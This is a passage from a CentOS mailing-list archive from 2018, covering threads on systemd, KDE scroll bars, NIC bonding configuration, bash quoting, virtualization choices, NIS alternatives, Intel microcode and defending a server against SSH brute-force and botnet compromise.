about systemd are doing so because (a) launchd is not being forced on them as systemd is in practice (in their view), and/or (b) because they disagree with systemd's specific architectural choices and/or their view of its quality. I should add that the speaker also massively over-simplifies opposition to systemd on the basis that he incorrectly perceives it to be opposition to change. He seems to ignore the fact that, as above, there are substantive objections to the specific architecture and quality of systemd, not merely objections to change with no deeper reason. He further seems to ignore the fact that many people objecting to systemd would nevertheless favour more modern system/service management. The speaker goes on to give his reasons as to why bringing service and system management to BSD is a good thing. As I point out above, many people could well agree with this, even many people who dislike the specific implementation of systemd on Linux. To be clear, objections to systemd on Linux largely seem to me to be about the specific implementation and perceived quality (and, dare I say it, personalities), rather than either fear or change or objection to modern system/service management. The speaker explicitly points out: "What can we [BSD] get from systemd? I'm not saying that we should adopt it [...] I don't think that trying to directly adopt system is going to work for us". He then goes on to point out why implementing a BSD kernel-based systems/service management component that is inspired by some of systemd's advantages (or, to put it another way, the advantages that any modern system/service management facility could and should offer) would be a good thing. As I say, many people, including many systemd-doubters or haters, would not object to this. He is not, however, saying that systemd will be used on BSD. He's just saying that the principles of system/service management are good ones and that software other than systemd could implement them. And that's exactly what a lot of systemd's critics say, too. -- Mark Rousell ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] What are the differences between systemd and non-systemd Linux distros?
Systemd is implemented in all the major distros, if you want to find ones that don't search for non-systemd. Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com TThis message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of Robert Moskowitz Sent: Tuesday, October 16, 2018 5:14 AM To: CentOS mailing list; Turritopsis Dohrnii Teo En Ming Subject: [EXTERNAL] Re: [CentOS] What are the differences between systemd and non-systemd Linux distros? On 10/16/18 1:54 AM, Turritopsis Dohrnii Teo En Ming wrote: > Good afternoon from Singapore, > > What are the differences between systemd and non-systemd Linux distros? > > Is systemd implemented in all the latest Linux distros? > > Please advise. Thank you. > > My advice is to go and read up on the original design goals of systemd. The information is out there. We had this discussion here years ago when we were staring and the impending transition. Read the archives on the angst the change engendered and the adjustment to the new methodology. They say that the Internet never forgets, so you should be able to find the original discussions and make your own judgment call. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Scroll bar arrows missing and behaviour change
Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com TThis message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of mark Sent: Friday, October 12, 2018 10:11 AM To: CentOS mailing list Subject: [EXTERNAL] Re: [CentOS] Scroll bar arrows missing and behaviour change Valeri Galtsev wrote: > On 10/12/18 8:40 AM, Leroy Tennison wrote: > >> And I thought it was a Kubuntu (Ubuntu with KDE desktop for those who >> aren't familiar) thing! Apparently it's a KDE thing. I haven't >> experienced the scrollbar aspect (or maybe I just haven't done what you >> do) but my arrows are missing too. I'm thinking this is a KDE Blasted >> Ugly Gotcha (BUG). BTW, if you haven't already discovered it, if you >> position your cursor where the arrows used to be the "arrow >> functionality" still exists (if you can get the cursor position just >> right). KDE now has invisible features... > > In the past as programmers we were taught more wisdom than today's > "coders" have been: One of the rules of thumb was: > > Don't make any changes in [debugged] program unless they are absolutely > necessary. > > On a similar note: who remembers netscape navigator (web browser)? It > was pleasantly not changing its appearance and UI (User Interface) for > ages. These days Firefox and thunderbird are being rushed with new > releases. "Releases" full of security holes (take a look at CentOS update > history: firefox security updates are the most often ones). As if > they are aiming to beat everybody in version number (currently major > version in 50th-60th). But they can not beat Microsoft who has a release: > Windows 2000. > Oh, and they had to jump 40 numbers, to keep up with Google/Chrome, because Right, like WinCrap, *have* to change the user interface, because... oh, that's right, they can sell more training. And the new UIs aren't as thought out, or TRIED OUT WITH END USERS as the old one was. and they don't care about some bugs... like t-bird "oh, you *can't* not want your email when you hit in the list, saving to your sent folder isn't enough copies > > > [no beginning of rant tag, as I'm not certain where to put it] > > Valeri mark ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos > Right, like WinCrap, *have* to change the user interface, because... oh, > that's right, they can sell more training. And I thought it was to give the appearance of "new and improved" when very little had really changed. (No rant here, just a statement of fact :-) :-) :-) ... ) ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Scroll bar arrows missing and behaviour change
Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com TThis message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of mark Sent: Friday, October 12, 2018 9:01 AM To: CentOS mailing list Subject: [EXTERNAL] Re: [CentOS] Scroll bar arrows missing and behaviour change Leroy Tennison wrote: > And I thought it was a Kubuntu (Ubuntu with KDE desktop for those who > aren't familiar) thing! Apparently it's a KDE thing. I haven't > experienced the scrollbar aspect (or maybe I just haven't done what you > do) but my arrows are missing too. I'm thinking this is a KDE Blasted > Ugly Gotcha (BUG). BTW, if you haven't already discovered it, if you > position your cursor where the arrows used to be the "arrow > functionality" still exists (if you can get the cursor position just > right). KDE now has invisible features... > Please don't top post. And I think it is only firefox. I run KDE on C7 - haven't looked on my C 6 at home - and it's only firefox 600.2esr, and there are no arrows, and no, I can't put my cursur anywhere, it got to that part of the page. My LibreOffice, my urxvt windows, and t-bird all have arrows. And it's annoying - I miss something, and suddenly I'm at the bottom of the page, instead of one window down. mark ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos Outlook bit me again, sorry for the top post. In my case the application is OpenOffice, I'll have to check LibreOffice and tbird. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
[CentOS] Scroll bar arrows missing and behaviour change
And I thought it was a Kubuntu (Ubuntu with KDE desktop for those who aren't familiar) thing! Apparently it's a KDE thing. I haven't experienced the scrollbar aspect (or maybe I just haven't done what you do) but my arrows are missing too. I'm thinking this is a KDE Blasted Ugly Gotcha (BUG). BTW, if you haven't already discovered it, if you position your cursor where the arrows used to be the "arrow functionality" still exists (if you can get the cursor position just right). KDE now has invisible features... Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com TThis message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of Gary Stainburn Sent: Friday, October 12, 2018 3:48 AM To: CentOS mailing list Subject: [EXTERNAL] [CentOS] Scroll bar arrows missing and behaviour change I have done some Googling on this but everything I've found appears to be at least 2 years old and mostly refers to Gnome TBH, I'm surprised nobody else has mentioned it - maybe it's only happened to me. At some point over the last few months the behaviour of the scroll bars changed and I'm finding it very annoying. Firstly, the arrows have vanished. Secondly, when clicking on the scroll bar background either above or below the drag bar instead of doing a page up or page down which is what it used to do (and what I want it to continue doing) it now moves the scroll bar to that absolute position, i.e. if I click on 75% down the scroll bar it jumps to 75% of the document. As this is happening in all apps I'm assuming it's something within KDE that had changed. I'm running an up-to-date Centos 7 x64 running the KDE desktop. Anyone got suggestions on how I can get back the the old style (windows clone) behaviour and appearance? ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
[CentOS] Need help with Linux networking interfaces and NIC bonding
I don't know if this is your situation or not but I have found in my bonding testing that failover can take what I consider to be an inordinate amount of time (as in up to 50 seconds). Were you "patient" (possibly using an altered definition of the term) to see if ping would eventually reply. Join us at the 2018 Momentum User Conference! Register here Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com TThis message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of Sean Son Sent: Thursday, October 4, 2018 12:44 AM To: CentOS mailing list Subject: [EXTERNAL] [CentOS] Need help with Linux networking interfaces and NIC bonding Hello everyone I am running into some strange issues when configuring networking interfaces on my physical server running Centos 7.5. Let me give you an overview of what's going on: We have a physical server, running CentOS 7.5. This server has one 4 port NIC and one 2 port NIC and a Dell IDRAC port. The first port of the 4 port NIC, em1, is used for Management traffic. The first port of the 2 port NIC, is used for the second port in the NIC bond, device p6p2. The second port on the 4 port NIC, device em2 is the first, port on the NIC bond. These interfaces are using Static IPs. Here is my /etc/sysconfig/network-scripts/ifcfg-em1 file. Please keep in mind that I have changed the IPs and MAC addresses in the files for security reasons: ifcfg-em1: TYPE="Ethernet" PROXY_METHOD="none" BROWSER_ONLY="no" BOOTPROTO="none" DEFROUTE="yes" IPV4_FAILURE_FATAL="no" IPV6INIT="yes" IPV6_AUTOCONF="yes" IPV6_DEFROUTE="yes" IPV6_FAILURE_FATAL="no" IPV6_ADDR_GEN_MODE="stable-privacy" NAME="em1" UUID="bbb2f9c2-141b-4a99-ab1e-328551aae612" DEVICE="em1" ONBOOT="yes" IPADDR="192.168.56.50" PREFIX="24" GATEWAY="192.168.56.1" DNS1="192.168.126.10" DNS2="192.168.220.10" IPV6_PRIVACY="no" NM_CONTROLLED=no as for the ifcfg-bond0 (the configuration file for the NIC bond, which is bond0): DEVICE=bond0 NAME=bond0 TYPE=Bond ONBOOT=yes BOOTPROTO=none IPADDR=192.168.56.70 PREFIX=24 BONDING_MASTER=yes BONDING_OPT="mode=1 miimon=100" TYPE=Ethernet and the ifcfg-slave1 configuration file, which is the first slave port for the NIC bond, this corresponds to em2: DEVICE=em2 HWADDR="c8:2f:87:fg:2a:31" ONBOOT=yes TYPE=Ethernet BOOTPROTO=none MASTER=bond0 SLAVE=yes and the ifcfg-slave2 configuration file , which corresponds to the second slave port for the NIC bond, which is interface p6p2: DEVICE=p6p2 HWADDR="00:6a:d7:7c:e8:09" BOOTPROTO=none ONBOOT=yes TYPE=Ethernet MASTER=bond0 SLAVE=yes I created a custom routing policy for the NIC bond, bond0. Here is the configuration for the routing policy: route-bond0: 192.168.56.0/24 dev bond0 src 192.168.56.70 table t1 default via 192.168.56.1 dev bond0 table t1 and the rule-bond0 file: table t1 from 192.168.56.70 as for the routing table: Kernel IP routing table Destination Gateway Genmask Flags Metric RefUse Iface 0.0.0.0192.168.56.10.0.0.0 UG0 00 bond0 192.168.56.00.0.0.0 255.255.255.0 U 0 00 bond0 192.168.56.00.0.0.0 255.255.255.0 U 0 00 em1 169.254.0.0 0.0.0.0 255.255.0.0 U 1002 00 em1 169.254.0.0 0.0.0.0 255.255.0.0 U 1008 00 bond0 now here is the scenario I am dealing with: This linux server is used for monitoring purposes. We have Nagios, Cacti and other tools installed on it. There are a few things I have noticed and I want help on: 1) Whenever I ping any of the devices on our network, from this server, the traffic goes out from the management port. I do not want the traffic to go out of the management port. I want it to go out through the active port of the NIC bond. How do I configure the networking so that all primary network traffic flows to and from the NIC bonded interfaces? I only wan
Re: [CentOS] Simple bash question
Sounds like you're pretty constrained if you can't escape $plusmore so alternatives may not be possible either but, if possible, put the contents represented by $plusmore in a file and {read,redirect the output from} the file in myscript. Another option might be to put the contents represented by $plusmore in an environment variable and access that from myscript. The only other option I can think of is to try a different scripting language (awk, perl, tcl, python, you-name-it) to try and get around the issue. Join us at the 2018 Momentum User Conference! Register here Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com TThis message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of Anand Buddhdev Sent: Friday, September 28, 2018 8:51 AM To: CentOS mailing list; Jerry Geis Subject: [EXTERNAL] Re: [CentOS] Simple bash question On 28/09/2018 15:39, Jerry Geis wrote: > I am calling a bash script and passing in somestring that includes a "$" > > myscript "$plusmore" > > I want to assign in the myscript the $1 arg to something like > MYTEXT="$1" > > when I do that I dont get what I'm expecting. if I do > MYTEXT='$1' > I still dont get what I'm expecting. > > On the first assignment of MYTEXT I do not want the "$" to be treated as a > shell variable. I cannot find out how to do that. > > I do not have the option of escaping the call to myscipt "\$plusmore". I > cannot do that. > > What am I missing. You MUST escape the $ in plusmore. If you don't, the calling shell will try to expand it, and replace it with whatever is in that variable. If it's not defined, you'll get an empty string. All this happens *before* myscript is even called. I'll add that escaping the $ can be done in other ways. Instead of a backslash, you can also do: myscript '$plusmore' Single quotes prevent variable expansion. However, if you are simply unable to quote $plusmore in some way, then you're stuck. Anand ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Centos 7.5 on Vmware
I agree with Nataraj about kvm/qemu/libvirt, we have 10+ hypervisors running it and it meets our needs but none of them are particularly heavily loaded. The only caution I would give is that there are occasions (mainly in the snapshot-associated arena) where the man page may simply say "do this" but, when you run the command on a distribution focusing on longer term support, you find it's not yet supported. And there are areas where Red Hat flatly states that there are issues (snapshots of the operating environment rather that just disk images). While this is true (for example, reverting to a snapshot reverts causes the system to have the date/time of the revert as well), we have still found value in these kinds of snapshots in a development environment. Save the Date 2018 Momentum User Conference September 25 - 28, 2018 Athens, Georgia: The Classic Center Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com TThis message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of Gregory P. Ennis Sent: Sunday, July 1, 2018 9:53 PM To: CentOS mailing list Subject: [EXTERNAL] Re: [CentOS] Centos 7.5 on Vmware On 06/28/2018 02:03 PM, Gregory P. Ennis wrote: > Everyone, > > I am in the initial study phase of putting together a larger virtual > server while using Centos 7.5 as the operating system of choice for > the > individual virtual machines. > > How do you all like VMware for this, or what other software allows > for > the development of virtural servers that use Centos 7.5 > > Thanks ahead of time for giving me a head start with your > experiences > It would be helpful if you gave more details about what you were looking for? Are you planning to run a bare metal hypervisor, or vmware under Linux or windows? What are you performance requirements? IO? CPU? What will the VM's be used for? Do guests requre a graphics console? Various vmware products ranging from ESXI to vmware workstation are very popular. I've run several of them. They work. I now use the Linux included, kvm/qemu based Red Hat/CentOS virtualization and it meets my needs very well for general testing/development, email server, web server kind of stuff. I also use this setup along with spice to run test systems with various graphic GUI's. I would not say that my virt servers are very heavily loaded. I have a Dell R210 running CentOS6 KVM/Qemu and a Dell XPS 9360 running Ubuntu 18.04 with kvm/qemu. If you prefer fancy mangement GUI's over writing scripts and editing config files, vmware might be better for you. kvm/qemu does include virt-manager which is a fairly simply GUI to create and manage VM's, but the user interface is not as comprehensive as the interface for managing ESXi. Red Hat does have their high end virtualization products, of which I believe at least 1 is a bare metal hypervisor. I have no personal experience with those products, though if client came to me with need, I would examine and seriously consider the Redhat products. One advantage to the kvm/qemu solution or possibly the redhat virtualization product is more integrated support. When I ran vmware, I used to run into situations where I wanted to beta test the newest release of some random linux distribution only to find out that vmware had not yet implemented support for the graphics driver or some other new hardware feature being used in the OS that I was trying to test. In this way, kvm/qemu feels more integrated. Like other software, kvm/qemu has bugs here and there, but overall, I'm very happy with it and I like the price of using it under CentOS and Ubuntu. I see clients all the time, go out and spend a fortune on huge vmware clusters, that end up very lightly loaded and could easily be run on a simple kvm/qemu server running under CentOS (or even one of the desktop virtualization solutions) with a backup server for redundancy, so I suggest to consider what your requirements really are. You could always go with Redhat if you require support. Nataraj - Nataraj, Thank you very much for your comments. I have not put
Re: [CentOS] How insecure is NIS ? Possible alternatives ?
I also looked into FreeIPA and the complexity is significant, at the time FreeIPA's DNS integration seemed to rely on a Fedora patch and I wasn't willing to introduce that into a production environment. Does anyone know if this has changed? Also, concerning alternatives, does anyone have experience with Shibboleth or OmniAuth? -Original Message- From: CentOS [mailto:centos-boun...@centos.org] On Behalf Of Leon Fauster Sent: Monday, March 26, 2018 6:41 AM To: CentOS mailing listSubject: [EXTERNAL] Re: [CentOS] How insecure is NIS ? Possible alternatives ? > Am 26.03.2018 um 11:59 schrieb Nicolas Kovacs : > > Le 26/03/2018 à 10:28, isdtor a écrit : >> In my opionion, there is a serious gap in this area. It's either NIS, >> simple, easy to setup yet insecure, or LDAP/FreeIPA/RH Id management >> server at a complexity at least one order of magnitude beyond NIS. > > I gave FreeIPA a spin a while back. I installed it on a sandbox > server, and from what I recall, it pulled in a tsunami of > dependencies, and first thing it wanted to replace my Dnsmasq with > BIND... so I didn't look much further. Quite time ago we had a stripped setup here working only with Openldap and PAM modules. LDAP with replication for redundancy, centralized communication with local CA and over TLS. It worked very well. The successor of such setup is SSSD for EL7 but the above should be still a feasible solution. -- LF ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
[CentOS] In reply to: What is best way of managing isolated network environment?
(Couldn't find the original request in my email but definitely have an idea). Set up an OpenVPN server on your network and create a client on the isolated network (set up to connect on boot), configure routing appropriately. You get to decide what subnet the VPN IP address is on, in this situation I recommend a static IP address for the client. From your network you connect to the OpenVPN IP address and connect to the rest of the isolated network from it (or set up multiple clients on the isolated network). ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] /lib/firmware/microcode.dat update on CentOS 6
What's amazing to me is, after "Intel Inside - don't divide" (their 486 debacle), they didn't learn and have a better plan for addressing these kinds of things. - Original Message - From: "Chris Murphy"To: "centos" Sent: Wednesday, January 24, 2018 12:06:01 PM Subject: Re: [CentOS] /lib/firmware/microcode.dat update on CentOS 6 On Tue, Jan 23, 2018 at 4:26 AM, Johnny Hughes wrote: > > Here are a couple of posts for our reading pleasure: > > Intel recommends not installing the microcode now: > http://intel.ly/2DsL9qz Except this doesn't mention microcode at all. I can't even tell WTF they're recommending not doing in this doc, it's that badly written. You have to infer, by reading two prior docs, that they're referring to microcode. And then you have to assume that's still what they're referring to when they say: "We recommend that OEMs, cloud service providers, system manufacturers, software vendors and end users stop deployment of current versions." Current versions of what? Microcode? But yes, indeed they appear to have pulled the 20180108 microcode, which was previously set to latest at this link, and it is now reverted to the 20171117 microcode. https://downloadcenter.intel.com/download/27337/Linux-Processor-Microcode-Data-File?v=t What these means for people who have CPUs which were not crashing (rebooting being a new euphemism for crashing) , but saw variant 2 Spectre mitigation with the 20180108 microcode, will lose full mitigation until Intel gets its ducks into a row. *eye roll* > Linus Torvalds agrees: > http://tcrn.ch/2n2mEcA His comments aren't about microcode though. And it also looks like he got IBRS and IBPB confused. The better post on this front is https://lkml.org/lkml/2018/1/22/598 As far as I know, there still is no mitigation for Spectre variant 1. -- Chris Murphy ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] 1600x900 not available
I run KDE too, if you find out how then please post, thanks. - Original Message - From: "m roth"To: "centos" Sent: Thursday, January 11, 2018 2:15:18 PM Subject: Re: [CentOS] 1600x900 not available Sean Smith wrote: > > On 01/11/2018 12:34 PM, m.r...@5-cent.us wrote: >> Sean Smith wrote: >> >>> setting my resolution to 1600x900 is a cheesy, yet effective, way to do >>> get what I need. >>> >>> ...Now if I can just get my touchpad to FRICK'N disable while typing. >>> >> If/when you do, *PLEASE* post the solution. If you're a manager, or >> gamer, I guess touchpads are great. If you're *typing*, they're dreadful, >> that's where the ball of my thumb goes. > > Okay, got the "disable touchpad while typing" thingy working. > > Here's what I did: > > Install dconf-editor if you haven't already. > > Then, from a console (not as su), run: > > dconf write /org/gnome/desktop/peripherals/touchpad/disable-while-typing > true > > This seems to have worked for me. > I usually run kde, so I'll have to look for something similar. Thanks, though. mark ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Failed attempts
And if you're really security conscious consider using port knocking (knock server - amazingly easy to set up. Or use fwknop, a little more difficult to set up but not much. Finally, for the hard core who really like pain - write the iptables rules yourself). - Original Message - From: "Pete Biggs"To: "centos" Sent: Monday, November 27, 2017 11:53:30 AM Subject: Re: [CentOS] Failed attempts On Mon, 2017-11-27 at 12:10 -0500, Jerry Geis wrote: > hi All, > > I happened to login to one of my servers today and saw 96000 failed login > attempts. shown below is the address its coming from. I added it to my > firewall to drop. > > Failed password for root from 123.183.209.135 port 14299 ssh2 > > FYI - others might be seeing it also. > As others have said, it's normal: dictionary based brute forcing of root; and no surprise that that IP is based in China. Welcome to the Internet. Primarily you need to make sure your root password is strong so it isn't vulnerable to this sort of attack. If it is, then the most nasty thing about this sort of thing is that your logs fill up. For your sanity then you can do the following: - disallow ssh root logins by password (login as an unprivileged user or use keys) - run something like fail2ban which will block a host for a predetermined amount of time after a number of failures. - don't run ssh on 22, use a different port. (Things get a lot quieter when you do that, but it comes with it's own problems and don't get complacent because someone will find the port eventually.) - if you only have a limited number of hosts or subnets logging in to your machine, adjust the firewall so that only they are allowed through. P. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] How to detect botnet user on the server ?
Another alternative is to use a FIMS/HIDS such as Aide (Advanced Intrusion Detection Environment), OSSEC or Samhain. Be prepared to learn a lot about what your OS normally does behind the scenes (and thus a fair amount of initial fine tuning to exclude those things). Aide seems to work well (I've seen only one odd result) and is quite granular. However, it is local system based rather than centralized and isn't daemon based so you're left with periodic checks and finding a way to protect the executable, database and configuration. OSSEC is centralized, daemon based and can check logs for anomalies. However, it is not nearly as granular as Aide and does produce false positives (for example, if 'detect new files' is used, it will detect based on access time changes rather than modification or change times - but only for a while...). If you select OSSEC, whatever you do, do NOT put extraneous files in /var/ossec/etc/shared - you can get truly bizarre and baffling results doing so. I only know about Samhain, if someone has experience I would very much like to hear about it's strengths and weaknesses. - Original Message - From: "Johnny Hughes"To: "centos" Sent: Monday, November 6, 2017 7:20:22 AM Subject: Re: [CentOS] How to detect botnet user on the server ? On 11/06/2017 07:06 AM, marcos valentine wrote: > Hello guys, > > > Whats is the best way to identify a possible user using a botnet with php > in the server? And if he is using GET commands for example in other server. > > Does apache logs outbound conections ? > > If it is using a file that is not malicious the clam av would not identify. This sounds like a good place to start: https://major.io/2011/03/09/strategies-for-detecting-a-compromised-linux-server/ (look for open ports connections both inbound and outbound with netstat, etc.) But, if someone has completely breached the machine and gotten root on it, they could put in fake binaries that hide ports and hide processes from 'top' (or ps, lsof). So, a look via chkrootkit or rkhunter would be needed to find that. The link for rkhunter in the article is bad .. here is the new one: http://rkhunter.sourceforge.net/ rkhunter seems to be in EPEL. chkrootkit is in fedora, it does not seem to be in EPEL. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] modestly priced laptop for C7
And I agree too, running Kubuntu 14.04 LTS on an HP Pavilion dv7 is acceptable, running Windows 7 was dog slow - hard drive crashed and we lost the Windoze license, sad story, all I could do was install Linux and go on instead of dual-booting when I needed Windoze - such a shame :-) :-) :-) - Original Message - From: "Yves Bellefeuille"To: "centos" Sent: Thursday, November 2, 2017 2:41:03 PM Subject: Re: [CentOS] modestly priced laptop for C7 Valeri Galtsev wrote: > And you are talking about 8 years old system on what would be called > decent hardware about the same 8 years back, right? The hardware is 6 years old and, at the time, Tech Report called it "the best netbook we've ever tested". So it was quite good (for a netbook) at the time. Everything depends on the OP's intended use, of course. I just wanted to disagree that you need better hardware for Linux than for Windows, or at least for CentOS 6 than Windows 7. -- Yves Bellefeuille ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] low end file server with h/w RAID - recommendations
Good to know about the HPE and Dell "gotchas", thanks to those who posted. I can speak to SuperMicro (11 systems, mostly X9 and X10). Hardware seems to be fine, management utilities (IPMI - like iLO) are more basic. The real heartburn right now is that the browsers for Linux have pretty much dropped NPAPI which means remote console doesn't work since it needs Java. They have alternatives on their web site (look for IPMIView and IPMICFG). One of their solutions only works with Gnome (but I don't remember which one - too long ago). Differing versions of IPMI firmware have their own quirks. Bottom line: support is there but more basic and not as easy to use. - Original Message - From: "Richard Zimmerman"To: "centos" Sent: Thursday, November 2, 2017 8:33:17 AM Subject: Re: [CentOS] low end file server with h/w RAID - recommendations I just put a call into AT Office 365 asking them to explain the spoof warning thing... To answer your question At the moment, no I can't. I like HPE stuff, we bought a DL380 gen9 say five months ago and totally happy with it. In fairness, its running Server 2012 r2 too but I didn't run into the hardware gotchas I did on the other stuff. It just seems HPE skimped on their lower end stuff and CentOS 6.x doesn't play well. This whole incident with the DL20 JUST happened. It's (finally) been spinning Server 2012 r2 for about a week now. It was a long 5 week process just to get to to this answer. I haven't had the time to research out what my next buys are going to be. I'm listening as well if someone has a suggestion. Honestly, I'm leaning against Dell because their stuff just doesn't seem to be built to last. We have 1 T620, 2 R620 servers. So far just past the 5 year mark, 3 dead hard drives, 2 power supplies. That is with the machines mostly TURNED OFF. (Failed IT project after I was hired; aborted a move to a new ERP system) With my personal Dell laptop just bought 4 months ago, periodically get the 6 beep on power on error. Tells me Dell quality / quality control might not be where it needs to be. Then again, I get a constant flow of HPE advisories. :( I've thinking of taking a look at Supermicro severs. Bottom line is, they all have their quirks, problems, deficiencies WHY did Lenovo have to quit selling the RS140's? I *LOVE* those machines Fast, reliable and just work GREAT with Centos 6.9! Regards, Richard -Original Message- From: CentOS [mailto:centos-boun...@centos.org] On Behalf Of hw Sent: Thursday, November 2, 2017 9:09 AM To: centos@centos.org Subject: Re: [CentOS] low end file server with h/w RAID - recommendations Richard Zimmerman wrote: > DO NOT buy the newer HPE DL20 gen9 or ML10 gen9 servers then (especially if > using CentOS 6.x) What would you suggest as alternative, something from Dell? ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] [OT] Bash help
